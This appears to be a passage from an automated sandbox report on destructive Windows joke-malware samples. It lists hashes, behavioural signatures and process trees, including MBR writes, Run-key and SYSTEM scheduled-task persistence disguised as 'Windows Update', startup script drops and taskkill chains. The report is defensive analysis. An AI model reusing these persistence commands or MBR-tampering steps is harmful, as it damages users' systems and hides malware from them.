| SHA1 | acd069dc223cc4802402944e5afec57d2ae31c08 |
| SHA256 | 732adadb4c7167e61f0f5763c2c01e43fb01369683d23c9652aea99f6c42c810 |
| SHA512 | 121f7f7c30361aa141192586133a670d989b2615d7e451b0e5a2e5375c46a67c9c404df4575778b7474ddf48b1be2d29d61df7d534473725d66295b3d4ef2919 |
\yourpc\melter.exe
| MD5 | d9baac374cc96e41c9f86c669e53f61c |
| SHA1 | b0ba67bfac3d23e718b3bfdfe120e5446d0229e8 |
| SHA256 | a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412 |
| SHA512 | 4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457 |
C:\yourpc\10.exe
| MD5 | e2001b6e75f84968a254b49faa45b7be |
| SHA1 | c70f93d5833543bb96c06a2e5a6642da0b283f12 |
| SHA256 | fa758441587efb6f25391ceda3bf7c9293555dbd7d36472a2c76c3036f6d9c33 |
| SHA512 | ebcd62730268b7f6f8b880a7c6d321bfb444e4a6ae0ea9e1a1c02a00db5737abd09b4db5e4515a9060de6d95cba49c5bd0e69a9903bdfd1c54f18eeb031220e3 |
C:\yourpc\Magix.exe
| MD5 | 026992ed7c38fae57e8839a6c0d883c8 |
| SHA1 | 9b389aa3dd774f3cfff3dcbe8ea8779ef005b31f |
| SHA256 | 68cb1fe2ee7c3f69fe2d508d117b502ed19337bd332e722605e491a823f89645 |
| SHA512 | d20fe47538b9e1fa0ccf198f5a4a31506cc59622b2492e9f64435fb06b66ccf93cde056693656da626ebf56ab434425fbf3291db979fe6c67b2a7a14649d9dc7 |
memory/1416-153-0x0000000000400000-0x000000000041D000-memory.dmp
memory/1628-154-0x0000000000400000-0x000000000041D000-memory.dmp
memory/2916-155-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2916-158-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2916-161-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2916-163-0x0000000000400000-0x0000000000413000-memory.dmp
\yourpc\RGB.exe
| MD5 | b326cda81e5711aed4c4dca71e111c3e |
| SHA1 | 9e64c68663135bbb1e55a839f46b00a634f3bee1 |
| SHA256 | 29297a0ff5b8b80cf5c96185ad6bd7a323dac9749185c516363e84b6710627ce |
| SHA512 | 2dfee83e49d83867f1a28c904d31920a393ad56e94c31bcab13a881f2caae35ac387de2e1b8b33b8b09655a6af8d619da63710c03f54d57ee76abf760a292e6b |
C:\yourpc\test.exe
| MD5 | 64a69d3a6620009ebe49595a5d8d119e |
| SHA1 | 4d478712f6503dc7f32e600d7b5aa0118c83214d |
| SHA256 | 199e4e84b644b264d170b04945880f095790206c65fdfb5a88c8ab73bd29357d |
| SHA512 | b2e6ace579201f74abea5d4aecf416980ab028d1876ffc57e474b2b2142489ec4589a4c151eafa4a9067b446396829a370c882b0d40ab8073ad7ff266bd6653f |
C:\yourpc\gl.exe
| MD5 | 754be91171c29e0b2b35c209553c6e45 |
| SHA1 | 73da71d831ba2c13aaf28a9e2d581ee52d95d639 |
| SHA256 | 595f476a34f1b6a481a89aec8bab0e323e7ccc7fbc53586982d26f681ddcc4a3 |
| SHA512 | 1ea4b1c01548275f701ccd09cc4018f60efcaacbcc8676fd989d05e9322e5f5bbd967e5206bfda18f6ce6d989dfa45cd4dd9155fc08c1fbdbb2ba025c2927fc6 |
memory/1456-176-0x0000000000400000-0x000000000041D000-memory.dmp
memory/1428-175-0x0000000000400000-0x0000000000422000-memory.dmp
\yourpc\Circle2.exe
| MD5 | 89c39815003090838eb6b7bd87f5525d |
| SHA1 | c5f2821319488dc541c91e8500328f09eeef4ac0 |
| SHA256 | 9ebda86d4ed28999d69c1e0f50fcab9b191bf15acc1d9cc0a597263ee36b6610 |
| SHA512 | 0c5c6bfe296a581f5d4ff77bb37e906382f00bf8ec2274f2c95dc334ae3e8d0806a54403434e32735b0e57cc715d184f62f99c713783a8f9d6c79ead007c383b |
memory/2656-195-0x0000000000400000-0x0000000000422000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win10v2004-20240226-en
Max time kernel
55s
Max time network
162s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Media\\logotip.jpg" | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3524 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 3524 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 3524 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe"
C:\Windows\Media\PCshakingv4.0.exe
"C:\Windows\Media\PCshakingv4.0.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x460 0x508
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
C:\Windows\Media\PCshakingv4.0.exe
| MD5 | 129c1a8094f0a6a9cdc9f63e86f8a482 |
| SHA1 | 917c6809ae03670edbf5da4cb19c49e85390642c |
| SHA256 | 2eadcdfd00b8bec4d18b71830cd334569844002a7971c56d3e1e38ff7972c4f3 |
| SHA512 | 076cf44955bebbad12ca905a36a12da4cd20520d8795e2f47f972ad996932731be4f007792954c9737b68330cd395a17ad19aa1e5b1c9e248379c37dcdf1a9e5 |
\??\c:\Windows\Media\Tobu.wav
| MD5 | 5c806e6fadc4b2b7fc497bf7dee7b516 |
| SHA1 | 11fcd5cd32a63a5c27387faf99a6a7bb5a321b63 |
| SHA256 | 2721c6f73e2323def0a13492cac64a1c22e44fc603ce9a1b7c5e92fb5f51c9c7 |
| SHA512 | dae704def25c729c33704ba18a02cc64ffd4cc24f6660d224dd06952522eacbee42ac1c8c05b3d4dfaf51d4b920c35979011613cc16ac31247cb405e025cbaa4 |
C:\Windows\Media\mouse.ico
| MD5 | 3abff26e58afe2b94ce801295336bf82 |
| SHA1 | b3222e30303115469b5b3e3d03ed9aed846d830f |
| SHA256 | fb078b09259f96b032dce2c345c683b6b9d9316819dc363edd780b91dc11704d |
| SHA512 | ba546709378b529eb8887cc5f7ff9f4bc587bae61af009adf8778dc3972c2e57d9291df6f2b6cc8ba36b27c262b8eb6f650d610fc1d731c154bb4cad6df46ac2 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win7-20240221-en
Max time kernel
137s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\Magix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\rgb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\snd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\gl1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\circle.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1D50.tmp\\mbr.exe" | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\rgb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\snd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\gl1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\circle.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe
"C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1D50.tmp\1D51.bat "C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe""
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.exe
bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\Magix.exe
Magix.exe
C:\Windows\system32\timeout.exe
timeout 30
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im bytebeat.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im Magix.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.exe
bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\test.exe
test.exe
C:\Windows\system32\timeout.exe
timeout 40
C:\Windows\system32\taskkill.exe
taskkill /f /im bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\rgb.exe
rgb.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\snd.exe
snd.exe
C:\Windows\system32\timeout.exe
timeout 50
C:\Windows\system32\taskkill.exe
taskkill /f /im rgb.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im snd.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\gl1.exe
gl1.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\circle.exe
circle.exe
C:\Windows\system32\timeout.exe
timeout 65
Network
Files
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\1D51.bat
| MD5 | 66f47a843ad967cd8824d29bbca65017 |
| SHA1 | d5a01629302123b6289a7bd677035ed5e237baaf |
| SHA256 | 3f2b8da496e474625ade273d664cf76b8a1b8ea2ba42e8656e92b7819793cab9 |
| SHA512 | 1e151e4e1fb69aa7311d8b754e435972e7f6bf47fbf4ad3a06516821b5d5a698e80cb03cec022137643c4c38d09527c5adfbe3846962f71cc7797c81093f034e |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\prompt.vbs
| MD5 | a1b56af69ace7a3738f2aeec477c4a33 |
| SHA1 | bfec32c379a396612d16624c8548943647d15c96 |
| SHA256 | 3c5331020e62e93f1ea06df0f227af2a5dd2355307be8e728282e9ddf5a1962c |
| SHA512 | ffaff006ca9115cb259fa92309836c08b9772f6d65907236bc210532ff4dd2b38c635175d346d6818266364f6c1e5a2109e01f841594222bac10f9f890f7c337 |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe
| MD5 | a15d67f06d5bb68b5a22283d84fb5077 |
| SHA1 | 3fd6fd5f561e1a540d3d24956e1e61d6a31f0a68 |
| SHA256 | 7d36b6c3cefa53f821f955a7a47d11db0a10d781e0ca2d2d2217feca4fc9c235 |
| SHA512 | 6ff79aac54e27d41f3323bea8c3f305a8b64d88fe9fa11e7eb39913242b731821020de11b7c759ba8cdf0241746ffa2eb29e02eb8e523f1c06b592dbac474e2e |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.exe
| MD5 | 445d48408fd9cb1bcadfb8243027a12b |
| SHA1 | cb1382d3870a4a821ce8e731d9401f7ba0c0da40 |
| SHA256 | 7a5b8795aed94dca80cc5e956f1b409135735637cc556c7b533acd6b2fbaee58 |
| SHA512 | b89d121f13a574d6b51125cb7b35ad68af22eeaa7b68b8cfbdcbdd228b941235a8a841906023274d93ee68ab64ca59251f6f7ffb2b59034616879e111359297f |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\Magix.exe
| MD5 | 026992ed7c38fae57e8839a6c0d883c8 |
| SHA1 | 9b389aa3dd774f3cfff3dcbe8ea8779ef005b31f |
| SHA256 | 68cb1fe2ee7c3f69fe2d508d117b502ed19337bd332e722605e491a823f89645 |
| SHA512 | d20fe47538b9e1fa0ccf198f5a4a31506cc59622b2492e9f64435fb06b66ccf93cde056693656da626ebf56ab434425fbf3291db979fe6c67b2a7a14649d9dc7 |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.wav
| MD5 | d6c579826cfdb4716612eefb5ee07c78 |
| SHA1 | a179e34b8811935942846451b98064c973c02c1a |
| SHA256 | aa2e99a722498dbc75870a1abc7a351da46b1bde1b349148efb5a237312c46fd |
| SHA512 | ada16dfef3f9e264108dff6ee975b79f38a38a733cff82b788897a140fa197f6816be1bea0ef425a56380d03fd6d45652ae4c8fbaef1a964bb1b7055af989c10 |
memory/2736-42-0x0000000000400000-0x0000000000423000-memory.dmp
memory/2560-43-0x0000000000400000-0x000000000041D000-memory.dmp
memory/2440-44-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2440-46-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2440-48-0x0000000000400000-0x0000000000413000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.exe
| MD5 | 6b673ece600bcc8a665ebf251d7d926e |
| SHA1 | 64ef7c73a713bf3c55fb4ac4e5366a7a425f1b4e |
| SHA256 | 41ac58d922f32134e75e87898d2c179d478c81edaae0d9bc28e7ce7d6f422f8b |
| SHA512 | feb18a1aa72de47fd67919e196abd200afdf22ad5a7e5dac20593252d8b2ca86982bb07c2fed3681ef06c9933c6d197590c1df65aa5df93cb6abafca5e53e9ff |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\test.exe
| MD5 | 64a69d3a6620009ebe49595a5d8d119e |
| SHA1 | 4d478712f6503dc7f32e600d7b5aa0118c83214d |
| SHA256 | 199e4e84b644b264d170b04945880f095790206c65fdfb5a88c8ab73bd29357d |
| SHA512 | b2e6ace579201f74abea5d4aecf416980ab028d1876ffc57e474b2b2142489ec4589a4c151eafa4a9067b446396829a370c882b0d40ab8073ad7ff266bd6653f |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.wav
| MD5 | cea9d2316f0e62a4fe233d6d9445fc53 |
| SHA1 | b058e7d7d96b717e6a47606eb6f632c4444ff800 |
| SHA256 | f61e579cdd011ea354c4d19bdfe140df9870f372ebe7b3ec747140a0771fe1a1 |
| SHA512 | e73aaeae358dc340c046f61dd29a629a3b2a20ebed7966a1d92da820c484154093bf42330cd0e0ad96373d2a25d1f0237abd8e34cdfd3ca9ccb3d6d310400394 |
memory/2484-54-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\rgb.exe
| MD5 | bfc9e8ab494313d6efb67fc8942f5ee9 |
| SHA1 | 1b42cc97803221538e020cb90517cb808cf19381 |
| SHA256 | 33cbdb6e00f3f42f58502af8a9150604a44bb9b26825c909aa0edb5c744a1f13 |
| SHA512 | 2d01f92397b65eade1f6140f80e2cb626b3e53b112c7e77e84ea7f6092b07c05eacb9e5e9bcb4676c8bdd10fcfba4fe297f2a01eedffffa594af87839baae030 |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\snd.exe
| MD5 | 7baad7b6dcd387183540a1a771e1b8d5 |
| SHA1 | 8fb4bc170b6e3050135e0c7b651441dbe963d7fc |
| SHA256 | 57e598fa7a93d50258afb6e563266521ae0bd35e6f80b247eb24a31a56a32461 |
| SHA512 | cfb85b10af70cc053a7c31a5d64741286b64eebd8ac9f3a97e6ed9989e81c629041808ce337d7b8c590f069da9a05e38e9b8dcf89b70e561362bff010732800b |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\noise.wav
| MD5 | 5144895869d5441a2a997bdb6d1b8576 |
| SHA1 | 357c7710b18c60ac13538506e43c4558c1422252 |
| SHA256 | 2cf498b82d0d0c51cf10a82e7221d24ad4afd378f31f79253261729e71e95b73 |
| SHA512 | 1c6d6cec3c2b9666b2c673fdda49eb431d2d321d77c7ce82a8033ff05dedb30a4145deec85f56235db1ad07b3540125b8d33fafc13f9e0569e55ea49a207215f |
memory/660-63-0x0000000000400000-0x000000000041D000-memory.dmp
memory/1468-64-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\gl1.exe
| MD5 | ac0cdb57f020158a4f356f0f819ac9a8 |
| SHA1 | 2fa07803943314ff4ff9a6ece448caccf327db54 |
| SHA256 | a47b0210f10011d86c59f19f929a860eaa2bd363ec1e01927c4edad404656b4b |
| SHA512 | a12a7441a107df43682bfe581d56891910bf8906b18a4049e822828c5d6d376e32ee69fc7f983afe98e9c1067e2962fa2895b643e4699568c4e053d89ca7b1eb |
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\circle.exe
| MD5 | ed169e40a69cf73fd3ac59215b24063f |
| SHA1 | 32d49462e74e6c08b941d8cd530a5f3c0f3b5764 |
| SHA256 | b8ffde2fc69292ffa1a704a1cf977eedfc86277a61d4937245d218d22674178c |
| SHA512 | f949a7b9b5dae91f887e7ce9bb45f7500534873d3baab5f5c2b1c31b1e185e70278ceb9d4f03f495460e0fb96399239fa678b0b4750ee870cbaa6333ab5ebb6c |
memory/2340-77-0x0000000000400000-0x000000000041D000-memory.dmp
memory/1712-78-0x0000000000400000-0x0000000000409000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
160s
Command Line
Signatures
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240608218 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\NyanCatIsHere.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\SysWOW64\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\SysWOW64\mspaint.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
